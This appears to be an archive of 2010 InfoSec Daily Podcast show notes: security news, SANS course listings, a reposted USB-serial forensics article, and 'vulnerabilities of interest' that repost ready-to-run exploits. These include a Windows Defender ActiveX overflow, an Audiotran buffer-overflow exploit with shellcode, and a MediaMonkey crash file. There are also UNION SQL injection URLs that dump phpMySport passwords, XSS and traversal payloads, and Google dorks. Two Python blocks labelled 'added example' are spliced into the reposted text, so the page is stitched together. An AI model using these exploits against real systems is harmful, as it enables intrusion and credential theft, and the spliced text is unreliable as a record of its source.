    #Date : [2010/01/19]
    #tested on :[windows 7]
    #Microsoft Windows Defender

    <html>
    <object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target'></object>
    <script language='vbscript'>
    targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
    prototype = "Sub WriteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String , ByVal eType As _MP_COM_CONFIG_TYPE , ByVal varValue As Variant )"
    memberName = "WriteValue"
    progid = "MpComExportsLib.MsMpSimpleConfig"
    argCount = 4

    arg1=String(6164, "A")
    arg2="defaultV"
    arg3=1
    arg4="defaultV"

    target.WriteValue arg1 ,arg2 ,arg3 ,arg4
    </script>
    </html>

News Items of Interest:

News item 1: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034&cid=RSSfeed

Microsoft released a patch today for the Internet Explorer CVE-2010-0249 Remote Code Execution Vulnerability.

News item 2: http://staging.arbornetworks.com/dmdocuments/ISR2009_EN.pdf

Arbor has released their 2009 Worldwide Infrastructure Security Report and it is an interesting read. The largest DDoS increased nearly 5-fold from 2004 to 2008 (and doubled from 2006 to 2008) to 49Gbps. At that size, we would definitely need the assistance of our upstream service provider to mitigate. The report also shows the continuing trend of not reporting/referring attacks to law enforcement.
News item 3: http://www.nvdaily.com/news/2010/01/hacker-redirects-traffic-from-library.php
A hacker redirected visitors to the Shenandoah County Library’s Web site Tuesday morning to advertising sites mostly geared toward the erectile dysfunction drug Cialis.

News item 4: http://www.infoworld.com/d/networking/skype-video-goes-multipoint-vivu-plug-in-696?source=rss_infoworld_news

Startup ViVu has released a software plug-in for Skype that allows the popular Internet calling service to be used for multipoint videoconferencing.

Skype can already be used to make voice calls between more than two parties, but the lack of multipoint video has been seen by some as its biggest shortcoming. The company said recently that one third of all Skype-to-Skype calls now include video.

Technical Segment: http://www.irongeek.com/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players

Tracking users, malware and data leaks via the USB serial numbers on flash drives, smart phones and MP3 players
I don’t write on the forensics side of security much, but I thought this was an interesting topic that I’d not seen covered much before. While I was doing my research on USB hardware key loggers I learned quite a bit about USB devices that I did not know before. Besides Vendor IDs and Product IDs, some devices also have a serial number associated with them. The “Serial Number Descriptor” string is optional, but a fair number of devices such as thumb drives, removable USB hard drives, PDAs and cell phones have them. This started me thinking: How could this data be used in a security or forensics context? I can think of a few scenarios off the top of my head:

- A USB flash drive is found with contraband on it, but none of the suspects claim to own it. If the serial number of the USB flash drive is found in one of the suspects' Windows registries, this is possible evidence as to who it belongs to.

- Malware has been spreading through your network, and you think thumb drives are the vector. Using the serial number you could search the network for computers where a known infected drive was used, to give you an idea of which workstations you will have to clean up. It may also lead you to who brought the malware into the network (Patient Zero), or who has been the biggest Typhoid Mary.

- You suspect some data has been stolen from a department server, and you find a suspicious MP3 player's serial number in the Windows server's registry. MP3 players can be used as generic storage devices. By searching the network for other boxes where that same MP3 player has been plugged in, you may find that the only other box it has ever been used on is Bob's. This makes Bob a likely suspect.

I’m guessing you could come up with other scenarios where tracking a USB device’s serial number could be useful. We can see the potential, but how do we get this data, and how do we automate using it? There are two main spots you can pull this information from on a Windows XP/Vista/7 system:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR

I cover both of these registry keys in more detail in my article ‘Forensically interesting spots in the Windows 7, Vista and XP file system and registry’ which you can find here:

http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots

Looking at these registry values directly is kind of cumbersome. A nicer way to look at this data is with NirSoft’s freeware tool USBDeview which you can download from:

http://www.nirsoft.net/utils/usb_devices_view.html

USBDeview gives the user a ton of information about what devices are currently plugged in, and which ones have been plugged in before but are not currently present.

Ok, now we know where on a Windows box this information is stored, but is there an automated way to find it and search our network for other locations where the same USB device has been used? Some organizations may have an asset tracking database that would be searchable for this information, but many of us don't have such a system in place. I was thinking of coding up something for the task, but I'm quite lazy. Then I remembered that most of Nir's tools have the ability to be used from across the network. Sure enough, USBDeview also has this option; all I had to do to connect to a remote Windows box and look through its registry for USB devices was to issue this simple command:

USBDeview /remote \\SomeComputer

Now keep in mind, I had to be logged in with an account that had access to that machine, and certain services have to be accessible. Nir has a nice blog post on what it takes for his tools to work from across the network:

http://blog.nirsoft.net/2009/10/22/how-to-connect-a-remote-windows-7vistaxp-computer-with-nirsoft-utilities/

That solves the problem of dumping information from one machine, but what about a whole network? Well, it seems USBDeview has an option for taking a list of machines from a text file and grabbing the USB device list from all of them. The syntax is pretty simple:

USBDeview /remotefile boxes.txt

where boxes.txt is a list of computer names/IPs in UNC format. For example:

\\192.168.1.13
\\192.168.1.14
\\skynet
\\cthulhu

It takes a bit of time for the results to return, so be patient. Once we get the report, we can sort by the 'Serial Number' field, look for repeating serial numbers by eye, and then scroll over to the 'Computer Name' field to see what computers that particular USB device has been used on. For my screen shots I've reordered the columns to put the fields I'm most interested in first. The 'Created Date' and 'Last Plug/Unplug Date' fields are also useful for figuring out a time line (really handy for finding a malware Patient Zero or Typhoid Mary based on when a user was logged on last). As you can see from the first screen shot, I have two different thumb drives from Patriot Memory that have been plugged into both my Skynet and Cthulhu workstations, but none of the other boxes I scanned:

From the 2nd screen shot you can see that my IronKey and my former roommate’s Android Phone have only ever been plugged into my workstation named Cthulhu:

This sort of information can be erased, but local attackers rarely think of the tracks that their USB devices leave behind. I cover erasing USB tracks in more detail in the anti-forensics video which I will link to at the end of this article.

Now you may be thinking: sorting and looking through the table for matching USB serial numbers by hand may be fine when you only have four workstations, but what if you have a lot more? Luckily, Nir implemented the ability to save his tool's output to many different file formats, including CSV (Comma Separated Values). Pretty much any database tool (MS Access for example) can import a CSV file, and from there you are just a few SQL queries away from finding the devices you are seeking. For example, if I wanted to look through the output for just the serial number 07850DA305FC an SQL query similar to this one may help:

SELECT Myoutput.*
FROM Myoutput WHERE Myoutput.[serial] = '07850DA305FC';

To dump your findings to a CSV you could take the results from the GUI, select all of the records (Ctrl-A), then choose the save icon and pick CSV from the drop down, but there is an easier way if you just intend to import the results into a database for sorting and searching. You can tell USBDeview to dump the output to a file without ever bringing up the GUI with this simple command:

USBDeview /remotefile boxes.txt /scomma myoutput.csv
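One way to run the same search without loading the CSV into a database, as an added example that is not code from the article or from NirSoft: a small Python script that reads a USBDeview-style CSV export, picks apart the USBSTOR instance path the registry keys above are built from, skips the host-generated IDs Windows assigns to devices that expose no serial number descriptor (their second character is an '&', so matching them across machines proves nothing), and reports which serials have been seen on more than one computer and where each was first plugged in. The column names, the timestamp format and the sample rows are assumptions constructed for the example; check them against the header of your own /scomma output.

```python
"""Correlate USB device serial numbers across Windows hosts (added example)."""
import csv
import io
from collections import defaultdict
from datetime import datetime

# Assumed timestamp format; USBDeview writes dates in the host's locale format.
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"

# Constructed sample shaped like a USBDeview export. Hosts, serials and times
# are invented for this example, not a real capture.
SAMPLE_CSV = r"""Device Name,Device Type,Serial Number,Instance ID,Computer Name,Created Date,Last Plug/Unplug Date
Patriot Memory,Mass Storage,07850DA305FC,USBSTOR\Disk&Ven_Patriot&Prod_Memory&Rev_PMAP\07850DA305FC&0,skynet,2009-12-01 09:15:00,2010-01-18 14:02:11
Patriot Memory,Mass Storage,07850DA305FC,USBSTOR\Disk&Ven_Patriot&Prod_Memory&Rev_PMAP\07850DA305FC&0,cthulhu,2010-01-19 08:40:00,2010-01-19 08:40:00
IronKey,Mass Storage,1C2A0011223344,USBSTOR\Disk&Ven_IronKey&Prod_Secure_Flash&Rev_1.00\1C2A0011223344&0,cthulhu,2009-11-05 17:20:00,2010-01-17 10:05:00
Generic USB Hub,Hub,6&2a1b3c4d&0,USB\VID_05E3&PID_0608\6&2a1b3c4d&0,skynet,2009-06-01 12:00:00,2010-01-18 07:55:00
Generic USB Hub,Hub,6&2a1b3c4d&0,USB\VID_05E3&PID_0608\6&2a1b3c4d&0,192.168.1.13,2009-06-02 12:00:00,2010-01-18 07:55:00
"""


def is_windows_generated(serial):
    """A device with no serial number descriptor gets a host-generated instance
    ID whose second character is '&' (e.g. '6&2a1b3c4d&0'). Those IDs are
    specific to the host that made them, so they are excluded from correlation."""
    return len(serial) > 1 and serial[1] == "&"


def parse_usbstor_instance(instance_id):
    """Split 'USBSTOR\\Disk&Ven_X&Prod_Y&Rev_Z\\SERIAL&0' (the subkey layout
    under HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR) into its parts."""
    parts = instance_id.split("\\")
    if len(parts) != 3 or parts[0].upper() != "USBSTOR":
        raise ValueError("not a USBSTOR instance path: %r" % instance_id)
    info = {"vendor": "", "product": "", "revision": ""}
    for chunk in parts[1].split("&"):
        for key, prefix in (("vendor", "Ven_"), ("product", "Prod_"), ("revision", "Rev_")):
            if chunk.startswith(prefix):
                info[key] = chunk[len(prefix):]
    serial = parts[2].rsplit("&", 1)[0]  # drop the trailing '&0' instance suffix
    info["serial"] = serial
    info["generated"] = is_windows_generated(serial)
    return info


def load_records(csv_text):
    """Read a CSV export with a header row into a list of dicts."""
    return [dict(row) for row in csv.DictReader(io.StringIO(csv_text))]


def hosts_by_serial(records):
    """Map each real (non-generated) serial to the set of hosts it was seen on."""
    seen = defaultdict(set)
    for r in records:
        serial = r["Serial Number"].strip()
        if not serial or is_windows_generated(serial):
            continue
        seen[serial].add(r["Computer Name"].strip().lower())
    return seen


def shared_devices(records):
    """Serials seen on more than one host: the article's WHERE serial = ...
    lookup, run for every serial at once."""
    return {s: sorted(h) for s, h in hosts_by_serial(records).items() if len(h) > 1}


def first_seen(records, serial):
    """Earliest 'Created Date' for a serial: the first host it was plugged into
    in this data set, the Patient Zero candidate for a USB-borne infection."""
    hits = [(datetime.strptime(r["Created Date"], DATE_FORMAT), r["Computer Name"].strip().lower())
            for r in records if r["Serial Number"].strip() == serial]
    if not hits:
        return None
    when, host = min(hits)
    return host, when.strftime(DATE_FORMAT)


def report(csv_text):
    """One line per shared device; the functions above return the raw data."""
    records = load_records(csv_text)
    lines = []
    for serial, hosts in sorted(shared_devices(records).items()):
        host, when = first_seen(records, serial)
        lines.append("%s seen on %s; first on %s at %s" % (serial, ", ".join(hosts), host, when))
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_CSV):
        print(line)
```

Point `load_records` at the contents of myoutput.csv instead of SAMPLE_CSV to run it over a real scan; the same serial showing up on two hosts is what the SQL query above finds one serial at a time.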

With a little automation you could make regular reports. I’m still interested in finding better ways to track this sort of information, so if you know of any good free or open source asset management systems that log USB serial numbers, or are interested in coding something to help automate these types of searches, please let me know.

If you’re interested in just covering your tracks when it comes to USB serial numbers, check out my anti-forensics video:

http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing

it’s about three hours and seven minutes long, but covers a lot more than just USB devices. I hope you have enjoyed the article, and feel free to follow me on Twitter @Irongeek_ADC .

Links at a glance:

USBDeview
http://www.nirsoft.net/utils/usb_devices_view.html

What it takes for Nir’s tools to work from across the network
http://blog.nirsoft.net/2009/10/22/how-to-connect-a-remote-windows-7vistaxp-computer-with-nirsoft-utilities/

Forensically interesting spots in the Windows 7, Vista and XP file system and registry
http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots

Anti-Forensics video
http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing

Update: To have the tool work on Windows 7 you will need to enable the Remote Registry Service as it is set to manual by default.

2010
01.20

InfoSec Daily Podcast

 

InfoSec Podcast Episode 50 for January 20, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

We would like to welcome Scott Moulton to our podcast. Scott is the president of Forensic Strategy Services, LLC and also owns a data recovery company, MyHardDriveDied.com. He is well known for his presentations at ShmooCon and DEF CON. His videos can be seen on youtube.com, and he personally developed the SANS course listed below.

For more information on SANS SEC606 go here.   Scott’s presentations can be found here and here.

2010
01.19

Episode 49 – Dorking Away

InfoSec Daily Podcast

 

InfoSec Podcast Episode 49 for January 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, the resulting downtime can have a devastating impact on a small or medium-sized business.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. VaroCMS Community Voting Web is subject to cross-site scripting and open-redirection vulnerabilities. Version 2.0 is impacted, though others may be vulnerable. Exploit code is available:
    Cross Site Scripting

    http://www.varocms.com/demo/search?q=[XSS]

    Open Redirection

    http://varocms.com/demo/login?return=[URL]

    http://blog.varocms.com/demo/register?return=[URL]

    http://www.varocms.com/demo/resize/1024?return=[URL]

    http://www.varocms.com/demo/resize/1280?return=[URL]

    http://www.varocms.com/demo/resize/1600?return=[URL]

    http://www.varocms.com/demo/resize/1920?return=[URL]

  2. The Joomla Prime component is subject to a directory traversal vulnerability. Example URL: http://www.sample.com/index.php?option=com_prime&lang=../../../../../../../../../../etc/passwd%00. Google Dork: inurl:”index.php?option=com_prime”
  3. Audiotran is subject to a direct RET buffer overflow vulnerability. Version 1.4.1 is affected, though others may be vulnerable. Exploit code is available:
    #!/usr/bin/perl
    # Exploit Title: Audiotran v1.4.1 direct RET BOF
    # Date: 2010-1-16
    # Author: Jacky
    # Software Link: http://www.e-soft.co.uk/Audiotran.htm
    # Version: 1.4.1
    # Tested on: Windows XP SP2
    # CVE : [if exists]
    # Code :
    #Audiotran v1.4.1 Direct RET local BOF Vulnerability.
    #Exploit Discovered by Sébastien Duquette (Greetz to him :P )
    #Written and coded by Jacky
    #All Greetz to Corelan team !
    #I saw this exploit written in python with SEH method !
    #When i tested it i saw that it could be exploited by a Direct RET Address !
    my $file="Crash.pls";
    my $junk="A"x1324;                # filler up to the saved return address
    my $eip=pack('V',0x77D8AED0);     # JMP ESP from USER32.DLL! (XP SP2 address, little-endian)
    my $presc="SEXY";                 # 4 harmless bytes ESP points at after JMP ESP
    my $sc="\x90"x50;                 # NOP sled
    $sc=$sc."\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
    "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x57".
    "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38".
    "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58".
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x43\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58".
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x34".
    "\x4b\x48\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".
    "\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x33".
    "\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57".
    "\x4e\x50\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x57\x4e\x41\x4d\x4a".
    "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x48\x42\x4b".
    "\x42\x50\x42\x30\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x43".
    "\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
    "\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x49".
    "\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46".
    "\x4e\x46\x43\x36\x42\x30\x5a";
    open(INI,">$file") or die "open $file: $!";
    print "[+]Creating Malicious Playlist File!\n";
    print INI $junk.$eip.$presc.$sc;
    print "[+]File Created!\n";
    print "[+]Real Author of the vulnerability is Sebastien Duquette!\n";
    print "[+]All Rights are reserved to him !\n";
    print "[+]Coded by Jacky!\n";
    close(INI);
  4. phpMySport is subject to SQL injection and unprotected file manager access vulnerabilities. Version 1.4 is impacted, while other versions may be vulnerable. The SQL injections are UNION-based: the attacker pads the SELECT to the column count of each affected query and places concat(member_login,0x3a,member_pass) in a column that is echoed back. Access to the file manager is unprotected, and by using dot-dot-slash (/../../) it is possible to view the directory structure of the target system. Google Dork: inurl:"phpmysport/index.php?" Example URLs are available:

    http://www.sample.com/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-

    http://www.sample.com/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-

    http://www.sample.com/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-

    http://www.sample.com/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-

    http://www.sample.com/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-

    http://www.sample.com/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-

    Access to File manager:

    http://www.sample.com/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop
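The UNION payloads above are easier to reason about against a live query. The following is an added example, not phpMySport's code: a constructed SQLite database stands in for the application's MySQL tables (so `||` replaces concat(...,0x3a,...) and the team table is cut down to three columns), a lookup in the style of `r=team&v1=view&v2=` pastes the request parameter straight into the SQL, and the script shows how the attacker first finds the column count by growing `UNION ALL SELECT 1,2,...` until the database stops erroring, how the final payload pulls logins and password hashes out of pms_member through an unrelated query, and why the parameterised version of the same lookup returns nothing for the same input. The `-- -` tail (encoded `--+-` in the URLs) comments out whatever the application appends; MySQL only treats `--` as a comment when whitespace follows it.

```python
"""UNION-based SQL injection against a constructed stand-in for phpMySport (added example)."""
import sqlite3

# The working payload from the URLs above, adapted to SQLite string syntax.
PAYLOAD = "' AND 1=2 UNION ALL SELECT 1, member_login || ':' || member_pass, 3 FROM pms_member-- -"


def build_db():
    """Constructed sample data: one member row and one team row (the hash is md5('password'))."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pms_member (member_id INTEGER, member_login TEXT, member_pass TEXT);
        INSERT INTO pms_member VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE pms_team (id INTEGER, name TEXT, city TEXT);
        INSERT INTO pms_team VALUES (1, 'Lions', 'Atlanta');
    """)
    return con


def vulnerable_lookup(con, v2):
    """The flaw behind index.php?r=team&v1=view&v2=...: the parameter becomes SQL text."""
    sql = "SELECT id, name, city FROM pms_team WHERE id = '%s'" % v2
    return con.execute(sql).fetchall()


def safe_lookup(con, v2):
    """Same query with a bound parameter: the value is data and can never become SQL."""
    return con.execute("SELECT id, name, city FROM pms_team WHERE id = ?", (v2,)).fetchall()


def find_column_count(con, max_columns=30):
    """The attacker's first step: widen 'UNION ALL SELECT 1,2,...' until the
    column counts match and the database stops raising an error. This is how
    the 23-, 17-, 19-, 8-, 14- and 28-column payloads above were derived."""
    for n in range(1, max_columns + 1):
        probe = "' AND 1=2 UNION ALL SELECT %s-- -" % ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_lookup(con, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    db = build_db()
    print("column count:", find_column_count(db))
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))   # leaks admin:<hash>
    print("parameterised:", safe_lookup(db, PAYLOAD))       # returns []
```

The `AND 1=2` in the payload empties the legitimate half of the UNION so only the attacker's row comes back; the fix is the bound parameter in `safe_lookup`, not filtering of the quote character.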

  5. Gallerie Hitmaaan is subject to a cross site scripting vulnerability.  Version 1.3 is impacted, while other versions may be vulnerable. Example URLs:
    http://www.sample.com/1367_hitmaaan-13/?gall=fonds&levela=>”><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

    http://www.sample.com/1367_hitmaaan-13/?gall=<img+src=http://www.sample.com/Utilisateur.gif+onload=alert(213771818860)>levela=email@email.com&num_page=1

  6. Thelia is subject to a cross site scripting vulnerability.  Version 1.4.2.1 is impacted, while other versions may be vulnerable. Example URLs: http://www.sample.com/panier.php?action=ajouter&ref=[XSS]
    http://www.sample.com/panier.php?action=ajouter&ref=”>
  7. MediaMonkey Player is subject to a denial-of-service vulnerability. Version 3.2.0 is impacted, while other versions may be vulnerable. Exploit code:
    #!/usr/bin/perl
    # Exploit Title: MediaMonkey Player Local Denial of Service (DoS)
    # Download : http://download.cnet.com/MediaMonkey-Standard/3000-2141_4-10109807.html
    # Date: 16/01/2010
    # Author: Red-D3v1L
    ## sh0otz fly t0 : j0rd4n14n.r1z,H1s0k4,ThE-g0bl!N,T3rr0rist,zAx,dr@g,h311c0d3 And All sEc-r1z CrEw#
    # n00bz : Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ...
    # Version: 3.2.0
    # my Home : www.sec-r1z.com , sEc-r1z CrEw#
    system ("color a");                       # Windows console colour, cosmetic only
    print "./SEC-R1Z 2010 - J0 str1k3z y0u!!\n";  # banner (the ASCII art in the original did not survive extraction)
    ###################################
    my $r1z = "b00m.mp3";
    my $boom = "\x41" x 5000;                 # 5000 'A' bytes written out as the .mp3 that crashes the player
    open(my $fh, '>>', $r1z) or die "open $r1z: $!";
    print $fh $boom;
    close($fh);
    print "[+] d0nE\n";


News Items of Interest:

News item 1: http://www.securitypark.co.uk/security_article264196.html

According to a Check Point global customer survey of businesses on endpoint security trends, the number of remote workers continues to grow and businesses need to expand their IT measures to safeguard the increasing mobile workforce.

Over 40% of businesses in the last year have more remote users connecting to the corporate network from home or when travelling, compared to 2008. Check Point discovered the clear majority (77%) of businesses have up to a quarter of their total workforce consisting of regular remote users.

News item 2: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3210284

According to Akamai Technologies, variants of the Conficker worm were still active and spreading during the third quarter, accounting for much of attack traffic on the internet.  Although mainstream and industry media coverage of the Conficker worm and its variants has dropped significantly since peaking in the second quarter, it is clear from this data that the worm (and its variants) is apparently still quite active, searching out new systems to infect.

During the third quarter, 78 percent of internet attacks observed by Akamai targeted port 445, up from 68 percent during the previous quarter. Port 445, which is used by Microsoft Directory Services, is the same port that Conficker targets, aiming to exploit a buffer overflow vulnerability in Windows and infect the targeted computer.

Most attacks originated from Russia and Brazil.

News item 3: http://www.theregister.co.uk/2010/01/18/jc_defaced/

The Jewish Chronicle website was defaced over the weekend by hackers calling themselves the “Palestinian Mujaheeds” who posted a rant against Israel’s blockade of the Gaza Strip. Hackers posted an image of the Palestinian flag alongside diatribes against Israeli security policy in both English and Turkish. The hacked front page of the site (www.thejc.com) also attempted to play an MP3 file, net security firm Sophos reports.

News item 4: http://www.thetechherald.com/article.php/201002/5090/SCNB-hit-by-breach—over-8-000-clear-text-credentials-stolen

An internal audit by Suffolk County National Bank (SCNB) discovered that over 8,000 customer online banking credentials were snatched from a server where they resided in plain text. Suffolk Bancorp said that the 8,378 records accounted for less than ten percent of their customer base at SCNB, but failed to explain the reasoning for leaving such information on a server in the clear.

News item 5: http://www.symantec.com/connect/blogs/drop-cn-spam

Symantec recently reported that the volume of URL spam from domains registered in China has decreased from ~40% of overall spam in December to ~20%. The drop is likely due to the recent enhancement in domain registration procedures introduced by China’s Internet Network Information Center (CNNIC). Chinese .CN domains are mostly exploited by Canadian Pharmacy spammers to host online pharmaceutical spam sites.

News item 6: http://www.sleuthkit.org/autopsy/download.php and http://www.sleuthkit.org/sleuthkit/history.php

Autopsy 2.22 and Sleuthkit 3.1.0 updates have been released.

News item 7: http://www.webpronews.com/topnews/2010/01/18/baidu-ctos-resignation-announced

It appears that not all is well (or at least normal) at Baidu. Last week, the company’s COO abruptly resigned, and today, its CTO followed suit. Both men cited “personal reasons” for their departures, and Baidu’s made little other information available.

Either exit might have been considered unremarkable on its own. The COO, Peng Ye, left before Google made its big statement about China, and also before hackers attacked Baidu, so “personal reasons” sounded like a semi-plausible explanation.

News item 8: http://globalist.org.ua/eng/144708-forbes%E2%80%99-top-10-most-advantageous-and-disadvantageous-professions-in-the-usa#more-708

Forbes magazine has ranked the ten most and least desirable professions in the US for 2010, drawing on research from the recruitment site CareerCast. The ranking is based on expected salary, labor-market demand, the comfort of the working environment and the level of stress.

Top of the list is actuary, the specialist who calculates losses and compensation for insurers and social-security schemes, a skill in particular demand during a downturn. Such a specialist can expect more than $85,000 per year with minimal stress.

Software engineer takes second place, with the same salary and strong prospects of employment.

News item 9:http://www.computerweekly.com/Articles/2010/01/14/239966/A-fifth-of-IT-to-disappear-by-2012.htm
Gartner has painted a bleak future for corporate IT in its latest predictions. The analyst company expects that by 2012, 20% of businesses will own no IT assets.   Gartner predicted that trends in virtualization, cloud-enabled services, and employees running personal desktops and notebook systems on corporate networks, would lower the amount of IT hardware businesses own.

If the ownership of hardware shifts to third parties, Gartner expected there would be major shifts throughout every facet of the IT hardware industry. This could mean that enterprise IT budgets would either be shrunk or reallocated to more-strategic projects and enterprise IT staff would either be reduced or reskilled to meet new requirements.

News item 10: http://www.technewsworld.com/story/69130.html
Google is reportedly looking into the possibility that one or more staff members at its office in China helped enable the attack on its infrastructure in mid-December.

After the attack was discovered, some Google China employees were denied access to internal networks, while others were put on leave, and still others were sent off to offices elsewhere in the Internet search giant’s Asia-Pacific operations, according to a Reuters report.

News item 11: http://seclists.org/fulldisclosure/2010/Jan/341

2010
01.18

Episode 48 – More Cowbell

InfoSec Daily Podcast

 

InfoSec Podcast Episode 48 for January 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, the resulting downtime can have a devastating impact on a small or medium-sized business.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

